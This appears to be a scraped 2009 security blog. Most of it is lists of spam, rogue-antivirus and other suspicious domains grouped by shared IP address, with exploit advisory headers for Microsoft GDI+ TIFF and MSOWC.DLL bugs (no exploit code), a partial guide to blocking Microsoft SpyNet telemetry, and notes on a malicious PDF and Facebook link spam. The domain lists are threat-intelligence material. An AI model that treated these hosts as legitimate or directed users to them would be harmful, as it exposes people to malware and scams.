www.zocatwl.cn
www.mifezxd.cn

IP Address: 193.227.114.2

yupnyojrufl.com
admin.kynugtab.com
cefjedhoha.com
homru.com
icpigyfzin.com
joellinoa.com
kynugtab.com
mail.cefjedhoha.com
mail.kynugtab.com
ns1.homru.com
ns2.homru.com

IP Address: 111.67.200.246

157c2.leyoksh.cn
f8b52.leyoksh.cn
38004a1.himoxbb.cn
www.zehuqlq.cn
ffb4973.xogurwy.cn
www.tuyezxx.cn
www.yexawls.cn
www.pijimjb.cn

IP Address: 124.217.210.223

brighthub.mindbigger.cn
diqorad.cn
discover.mindbigger.cn
enginering.mindbigger.cn
jujezuj.cn
mindbigger.cn
mindshops.cn
ns1.diqorad.cn
ns1.jujezuj.cn
ns1.mindbigger.cn
ns1.mindshops.cn
ns1.rvoxbdci.cn
ns1.rxcounterattack.cn
ns1.rxerudition.cn
ns1.rxexacerbate.cn
ns1.rxlitters.cn
ns1.rxpaternoster.cn
ns1.rxpuddle.cn
ns1.rxreemployment.cn
ns1.rxsectors.cn
ns1.rxslobbered.cn
ns1.rxtweak.cn
ns1.rxyoghurt.cn
ns1.wilfre.cn
ns1.zapoqiw.cn
ns2.brightpalilaliaazuz.cn
ns2.diqorad.cn
ns2.mindbigger.cn
ns2.rvoxbdci.cn
ns2.rxcounterattack.cn
ns2.rxerudition.cn
ns2.rxexacerbate.cn
ns2.rxlitters.cn
ns2.rxpaternoster.cn
ns2.rxreemployment.cn
ns2.rxsectors.cn
ns2.rxslobbered.cn
ns2.rxtweak.cn
ns2.rxyoghurt.cn
ns2.zapoqiw.cn
ns3.diqorad.cn
ns3.jujezuj.cn
ns3.mindbigger.cn
ns3.rvoxbdci.cn
ns3.rxcounterattack.cn
ns3.rxerudition.cn
ns3.rxexacerbate.cn
ns3.rxlitters.cn
ns3.rxpaternoster.cn
ns3.rxpuddle.cn
ns3.rxreemployment.cn
ns3.rxslobbered.cn
ns3.rxtweak.cn
ns3.wilfre.cn
ns3.zapoqiw.cn
ns4.diqorad.cn
ns4.mindbigger.cn
ns4.rvoxbdci.cn
ns4.rxerudition.cn
ns4.rxexacerbate.cn
ns4.rxlitters.cn
ns4.rxpaternoster.cn
ns4.rxpuddle.cn
ns4.rxreemployment.cn
ns4.rxsectors.cn
ns4.rxslobbered.cn
ns4.rxtweak.cn
ns4.rxyoghurt.cn
ns4.zapoqiw.cn
peril.mindbigger.cn
rxchoice.cn
rxcounterattack.cn
rxerudition.cn
rxexacerbate.cn
rxhugs.cn
rxlitters.cn
rxoccupier.cn
rxpaternoster.cn
rxpuddle.cn
rxreemployment.cn
rxsectors.cn
rxslobbered.cn
rxtonsillectomy.cn
rxtweak.cn
rxyoghurt.cn
scotish.fodmantel.cn
www.diqorad.cn
www.jujezuj.cn
www.rvoxbdci.cn
www.rxcounterattack.cn
www.rxerudition.cn
www.rxexacerbate.cn
www.rxlitters.cn
www.rxoccupier.cn
www.rxpaternoster.cn
www.rxpuddle.cn
www.rxreemployment.cn
www.rxsectors.cn
www.rxslobbered.cn
www.rxtweak.cn
www.rxyoghurt.cn
www.zapoqiw.cn
zapoqiw.cn
finding.bulliedwatches.cn
facing.minddeal.cn

IP Address: 221.203.168.175

05e.keiscpom.cn
09cfn.ptijsbat.cn
0bv.adadjvcbje.cn
4bf.tkmqtnek.cn
4nwnzdw.yxukawlv.cn
5wh.uoosfkvfbt.cn
6fuwf.listweek.cn
7p5t.bcozanow.cn
880y6.xrcatvgs.cn
9tqtg7.srwuiuyc.cn
aanfsgnuje.cn
adadjvcbje.cn
admin.aanfsgnuje.cn
admin.cnsffmvssw.cn
admin.flushstreet.com
admin.flushwrong.com
admin.flushyear.com
admin.fvqdalrfuj.cn
admin.groundlong.cn
admin.hxukawyv.cn
admin.iaxacrug.cn
admin.iqbgwrue.cn
admin.ittjdfhh.cn
admin.listweek.cn
admin.padfgrvbit.cn
admin.ptijsbat.cn
admin.roundlong.cn
admin.srwuiuyc.cn
admin.tkmqtnek.cn
admin.ultimate-replicas.com
admin.uoosfkvfbt.cn
admin.wordlong.cn
admin.yxukawlv.cn
b9or.veiqscia.cn
cnsffmvssw.cn
crjd90.wordlong.cn
drcfnwl.icesfjsfsb.cn
ea759.diffsivioe.cn
eo0.groundlong.cn
f3vxcw6.fvqdalrfuj.cn
f5ow3fr.aanfsgnuje.cn
fbevgi.cnsffmvssw.cn
flushstreet.com
flushwrong.com
flushyear.com
fvqdalrfuj.cn
groundlong.cn
ht92tu.padfgrvbit.cn
hxukawyv.cn
iaxacrug.cn
iqbgwrue.cn
ittjdfhh.cn
ivu.seiapsny.cn
jei70p.icesfjsfsb.cn
listweek.cn
ns1.aanfsgnuje.cn
ns1.cnsffmvssw.cn
ns1.flushstreet.com
ns1.flushwrong.com
ns1.flushyear.com
ns1.fvqdalrfuj.cn
ns1.groundlong.cn
ns1.hxukawyv.cn
ns1.iqbgwrue.cn
ns1.ittjdfhh.cn
ns1.listweek.cn
ns1.padfgrvbit.cn
ns1.roundlong.cn
ns1.tkmqtnek.cn
ns1.ukmqtnsc.cn
ns1.ultimate-replicas.com
ns1.uoosfkvfbt.cn
ns1.wordlong.cn
ns1.yeiexixo.cn
ns2.aanfsgnuje.cn
ns2.cnsffmvssw.cn
ns2.fvqdalrfuj.cn
ns2.groundlong.cn
ns2.hxukawyv.cn
ns2.iqbgwrue.cn
ns2.ittjdfhh.cn
ns2.listweek.cn
ns2.padfgrvbit.cn
ns2.roundlong.cn
ns2.tkmqtnek.cn
ns2.uoosfkvfbt.cn
ns2.wordlong.cn
ns2.xeuiavwp.cn
omsw98.seiapsny.cn
padfgrvbit.cn
roundlong.cn
tkmqtnek.cn
ultimate-replicas.com
uoosfkvfbt.cn
walyjl4.hxukawyv.cn
wordlong.cn
wsess.deivgxri.cn
wyr.ittjdfhh.cn
xc12.roundlong.cn
xcwd.yxukawlv.cn
qirlr2.pinazxjud.cn
87ie3c.hxusksfffv.cn

IP Address: 58.22.138.39

rxdemographical.cn
ns3.rxyoghurt.cn
ns4.rxcounterattack.cn
rxforgery.cn
rxcounterattack.cn
rxyoghurt.cn


Thursday, November 5, 2009

Microsoft GDI+ TIFF Memory Corruption Vulnerability

Reference: http://www.shinnai.net

#-----------------------------------------------------------------------
# Microsoft GDI+ TIFF Memory Corruption Vulnerability
# url: http://www.microsoft.com/technet/security/Bulletin/ms09-062.mspx
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#-----------------------------------------------------------------------


Reference:

Microsoft Office Data Source Control 9.0 (MSOWC.DLL) Null Pointer DoS


Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/

File: MSOWC.DLL
Ver.: 9.0.0.8966
ProgID: OWC.DataSourceControl.9
Descr.: Microsoft Office Data Source Control 9.0

Marked: RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety:True
IDisp Safe: Safe for untrusted: caller

Member: DeleteRecordSourceIfUnused (ByVal RecordSource As String)

Rogue AV Antivirus Reviews - Paretologic, Norton, Mcafee, PCtools


IP Address: 209.200.247.194

Domains sharing same IP address:

2009antivirusreviews.com
2009datarecoveryreviews.com
activexfix.org
chkdskerrors.com
driversdownloadhub.com
driversupdate.org
fastfastpc.com
fastuninstaller.com
fixoutlookexpress.org
freerecordsregistry.com
inmate-finder.com
makepcfaster.org
myhostingreviews.com
pcperformancetools.com
program-uninstaller.com
speedypc.org
top25workathome.com
windowsfix.org
www.driversdownloadhub.com
www.driversupdate.org
www.fastfastpc.com
www.freerecordsregistry.com
www.myhostingreviews.com
www.pcperformancetools.com
www.windowsfix.org


IP Address: 209.200.247.194

Domains sharing same IP address:

2009antivirusreviews.com
2009datarecoveryreviews.com
activexfix.org
chkdskerrors.com
driversdownloadhub.com
driversupdate.org
fastfastpc.com
fastuninstaller.com
fixoutlookexpress.org
freerecordsregistry.com
inmate-finder.com
makepcfaster.org
myhostingreviews.com
pcperformancetools.com
program-uninstaller.com
speedypc.org
top25workathome.com
windowsfix.org
www.driversdownloadhub.com
www.driversupdate.org
www.fastfastpc.com
www.freerecordsregistry.com
www.myhostingreviews.com
www.pcperformancetools.com
www.windowsfix.org

Wednesday, November 4, 2009

Spam ** 04-Nov-09

IP Address: 208.67.219.132

Domains sharing same IP Address:

yupnyojrufl.com
goowy.net
iris-germany.com
quienestadetrasdelascuarderias.org
www.iengkque.cn
www.iufkwbue.cn
ofralfyski.com
copobpt.cn
tikesdx.cn
www.gotfed.com
recorta.com

IP Address: 59.53.88.133

Domains sharing same IP address:

42ad7d.camacnm.cn
dxzhaosheng.cn
gudurc.com
gyalirad.cn
hkjinlong.com
www.558job.cn
www.dxzhaosheng.cn
deyuwec.cn
www.nekexkk.cn
www.fijattf.cn


IP Address: 60.172.210.4

Domains sharing same IP address:

*.bjogivos.cn
*.cbuhovig.cn
*.ddekowim.cn
*.dimaxal.cn
*.djubatuj.cn
*.gguwelag.cn
*.gnaburen.cn
*.gpucivek.cn
*.hfizipan.cn
*.hlapowoc.cn
*.jagegop.cn
*.jduridew.cn
*.jogawaw.cn
*.kqadibul.cn
*.lxucubaf.cn
*.nevutud.cn
*.nwurakex.cn
*.nxugiral.cn
*.pnunidun.cn
*.psavapip.cn
*.pxefidag.cn
*.pzuqeleh.cn
*.qgohogok.cn
*.rikanoj.cn
*.rwihopot.cn
*.slujarug.cn
*.sxopiken.cn
*.ttanames.cn
*.vsaqifuj.cn
*.xlejuwof.cn
*.yveqekov.cn
*.zsojexuh.cn
*.zsumuhey.cn
*.zxatuyox.cn
0cb26.jduridew.cn
178.zsezukes.cn
2002.vkalufor.cn
230951.gcuzipoj.cn
2edb5.jogawaw.cn
303190.jyasuhev.cn
3293ae.bjexipat.cn
38b680.xreyupuc.cn
402.zulapep.cn
428c.ntademef.cn
4ea6.pzuqeleh.cn
51cf.xpasetad.cn
523.fmacinuy.cn
532b.jjobijen.cn
5965a.sxuzejaf.cn
5c563.cquconej.cn
66d2f3.gzuvafuz.cn
66ead0.qnabefuc.cn
68e4a.gxohudet.cn
6bf8.nxugiral.cn
702.rwihopot.cn
8a4695.txusinuf.cn
8acc.zsumuhey.cn
90c06.dkaxirey.cn
9340e.zcuxedoc.cn
9d8d1.bjidasut.cn
b1ec.hlapowoc.cn
b26.nwifiwed.cn
b555.gnaburen.cn
ba94.rwukison.cn
benefit.gyefocev.cn
bj9.ru
borngentle.com
c852.cvupuqal.cn
d11.hfizipan.cn
d57e8.klosoqiw.cn
dc7f.qgapefey.cn
e75.jagegop.cn
eb0.pxefidag.cn
eef56.lyalojuf.cn
everest.qdegivah.cn
f984.jnomariq.cn
gguwelag.cn
gxohudet.cn
hlapowoc.cn
jagegop.cn
jyasuhev.cn
klosoqiw.cn
kmakafum.cn
lqafokuw.cn
lxucubaf.cn
mhuhafuy.cn
movement.qlonipaf.cn
nevutud.cn
ntademef.cn
overal.wsemuhin.cn
pxefidag.cn
pyonelul.cn
qcesipof.cn
qforuhum.cn
rikanoj.cn
rkujalal.cn
rwihopot.cn
sxopiken.cn
sxuzejaf.cn
vkalufor.cn
www.ddekowim.cn
www.lxucubaf.cn
www.slujarug.cn
www.zziduxux.cn
xcopidox.cn
xehicaw.cn
xlejuwof.cn
xreyupuc.cn
xzewutos.cn
ysuyonoh.cn
yveqekov.cn
zicorem.cn
zsezukes.cn
zulapep.cn
zziduxux.cn


IP Address: 60.172.210.3

Domains sharing same IP address:

*.nicebob.com
barrington.steadybreak.com
bentham.steadywall.com
bibscreen.com
breakwin.com
darkfrom.com
intrigue.steadyblur.com
killjoy.steadybreak.com
linefollow.com
nicebob.com
ns1.nicebob.com
ns2.countrydnsname.com
ns2.dnsgetonline.com
ns2.fullmountdns.com
ns2.grabdnsinfo.com
ns2.hostmasterpro.com
ns2.linkdnspowersetup.com
ns2.linkdnssetup.com
ns2.roadhostdns.com
ns2.skyhostingpower.com
ns2.wallpaperdns.com
ns2.wishstardns.com
ns2.worlddnstype.com
towelnow.com


IP Address: 60.172.210.5

Domains sharing same IP address:

*.8888r.com
*.baidugame.cn
*.hondy.net
*.sf66666.com
*.wuhu365.com
1maile.com
51jsbbs.com
7cspk.com
8888r.com
ahfcst.com
ahhaopu.com
bu2007.com
fagao888.com
fcjstz.com
gyljf.com
hkyurun.com
hnjpt.com
hzshuiyun.com
jcfw2008.com
nlaixin.com
nojetpm.com
nxspxx.com
rijinmuju.com
sylzgy.com
szsdck.com
weinotts.com
whcbzs.com
whyrhz.com
wuhu365.cn
wuhu365.com
wuhucrm.cn
wuhugogo.com
wuhumail.com
wuhuprinter.com
www.wuhu365.com
xinyuemusic.com
xn--49ss1hl9pext.com
yjgafj.com


IP Address: 218.75.149.156

Domains sharing same IP address:

*.blahbeauty.com
*.blushcold.com
*.flushstick.com
*.iawhosue.cn
*.iqbgwrue.cn
*.iqmeiuea.cn
*.marlinsign.com
*.ocsmncea.cn
*.osjjjzea.cn
*.seamarlin.com
*.sunwrong.com
admin.blushcold.com
admin.iqbgwrue.cn
admin.sunwrong.com
bell.roundflow.com
bendbrand.com
bgu735.ocsmncea.cn
blahbeauty.com
blushcold.com
blushwire.com
catlike.cruisesound.com
code59884.rolexoffertoday.com
cruisesound.com
flushstick.com
iawhosue.cn
iqbgwrue.cn
lgt674.iawhosue.cn
marlinautumn.com
marlinsign.com
nrnpf343.aijnaido.cn
ns1.getsomedns.com
ns1.marlinsign.com
ns1.onlinetagdns.com
ns1.serverraw.com
ns1.sunwrong.com
ns2.dnslackingtemp.com
ns2.iqmeiuea.cn
ns2.marlinsign.com
nucleic.marlinautumn.com
ocsmncea.cn
osjjjzea.cn
seamarlin.com
siberia.marlinautumn.com
since.brownsunny.com
smart.marlinsign.com
smart.seamarlin.com
stipple.brownsunny.com
sunwrong.com
www.blahbeauty.com
www.flushstick.com
www.sunwrong.com

IP Address: 221.203.168.175

Domains sharing same IP address:

*.aenkweac.cn
*.cnsffmvssw.cn
*.flushstreet.com
*.flushwrong.com
*.flushyear.com
*.fvqdalrfuj.cn
*.iqbgwrue.cn
*.ittjdfhh.cn
*.listweek.cn
*.padfgrvbit.cn
*.roundlong.cn
*.ukmqtnsc.cn
*.ultimate-replicas.com
*.xeuiavwp.cn
09cfn.ptijsbat.cn
4nwnzdw.yxukawlv.cn
6fuwf.listweek.cn
9tqtg7.srwuiuyc.cn
admin.cnsffmvssw.cn
admin.flushstreet.com
admin.flushwrong.com
admin.flushyear.com
admin.fvqdalrfuj.cn
admin.iaxacrug.cn
admin.iqbgwrue.cn
admin.ittjdfhh.cn
admin.listweek.cn
admin.padfgrvbit.cn
admin.ptijsbat.cn
admin.srwuiuyc.cn
admin.ultimate-replicas.com
admin.yxukawlv.cn
b9or.veiqscia.cn
cnsffmvssw.cn
f3vxcw6.fvqdalrfuj.cn
fbevgi.cnsffmvssw.cn
flushstreet.com
flushwrong.com
flushyear.com
fvqdalrfuj.cn
ht92tu.padfgrvbit.cn
iaxacrug.cn
iqbgwrue.cn
ittjdfhh.cn
jei70p.icesfjsfsb.cn
listweek.cn
ns1.cnsffmvssw.cn
ns1.flushstreet.com
ns1.flushwrong.com
ns1.flushyear.com
ns1.fvqdalrfuj.cn
ns1.iqbgwrue.cn
ns1.listweek.cn
ns1.padfgrvbit.cn
ns1.ukmqtnsc.cn
ns1.ultimate-replicas.com
ns1.yeiexixo.cn
ns2.cnsffmvssw.cn
ns2.fvqdalrfuj.cn
ns2.iqbgwrue.cn
ns2.ittjdfhh.cn
ns2.listweek.cn
ns2.padfgrvbit.cn
ns2.xeuiavwp.cn
omsw98.seiapsny.cn
padfgrvbit.cn
ultimate-replicas.com
wyr.ittjdfhh.cn
xcwd.yxukawlv.cn

Monday, November 2, 2009

How to block Microsoft SpyNet

This is not something new, I would like to post again here so that Windows 7 or Vista users aware about this. Normally the intrusion prevention in your systems will alerting when SpyNet is pinging.


Microsoft Security Essentials

Microsoft Security Essentials is the latest avatar of Microsoft antispyware. It is a signature based free antimalware software that can be used to protect your system against potential threats, such as viruses, spyware, and other potentially unwanted software.

Microsoft Spynet

When you first install Microsoft Security Essentials you agree to become a part of this unfortunately named community of Windows Defender and Microsoft Security Essentials users. Microsoft SpyNet helps Microsoft in differentiating a malware program from a legitimate program based on inputs automatically collected from the Microsoft SpyNet members.

There are two types of memberships basic and advanced. As a basic member -which is the default- your copy of Microsoft Security Essentials “sends basic information to Microsoft about software that Microsoft Security Essentials detects, including where the software came from, the actions that you apply or that Microsoft Security Essentials applies automatically, and whether the actions were successful. In some instances, personal information might unintentionally be sent to Microsoft. However, Microsoft will not use this information to identify you or to contact you.”

An advanced member sends more information in addition to what is stated above and again “in some instances, personal information might unintentionally be sent to Microsoft.” Microsoft Security Essentials also collects standard computer information, which includes information about your computer software and hardware, such as your IP address, operating system, Web browser software, and version.”

There is no option not to participate in the SpyNet community. Microsoft Security Essentials privacy policy confirms that “to continue using Microsoft Security Essentials, you will need to remain a member of this online community.”

The mandatory enrolling of members in the SpyNet community makes many people to see red and seek ways to disable Microsoft SpyNet without losing the functionality of Microsoft Security Essentials.
Blocking Microsoft SpyNet without losing functionality

According to Microsoft documentation “The online Microsoft SpyNet community helps you see how other people respond to software that has not yet been classified for risks. You can use this information to help you choose whether to allow this software on your computer. In turn, if you participate, your choices are added to the community ratings to help other people decide what to do. ” The community also helps stop the spread of new infections.

This means that if you block Microsoft SpyNet your choices in rating the programs that you run are NOT added to the community while you use other people’s choices to respond to potential threats. If you really want to do this, proceed further.

There are two ways to go about this. One is through editing the registry and the other is by entering couple of entries to your hosts file.
Block Microsoft SpyNet by editing the Registry

All caveats about editing the Windows registry apply here. Before you edit the registry, export the keys in the registry that you plan to edit, or back up the whole registry. How to back up and restore the registry in Windows

Type regedit in the run command box and press enter to open the registry editor. Navigate and select the following key on the left pane:

The XML-Bombed PDF

Reference: blog.didierstevens.com

Didier Steven disclosed about PDF exploit that related to Extensible Metadata Platform. Adobe already aware about this vulnerability and patched was released to fix the vulnerability.


simple-works.org spamming in Facebook

Not surprising that Facebook become one of the threat landscape for the last few months and the more and more threat will come from Facebook. My reader today sent me email regarding the spam message that spread from hacked or compromised accounts. The message sound "Saturday News simple-works.org". It will enticing the friends within the account to view the URL link that posted in message. From here, users can be easily become victim and vulnerable to the web attacks.


Other than facebook, twitter also become another threat landscape for spreading the suspicious link. According to "trendistic.com", "simple-works.org" words are one of the famous words spread through twitters.


Reference: trendistic.com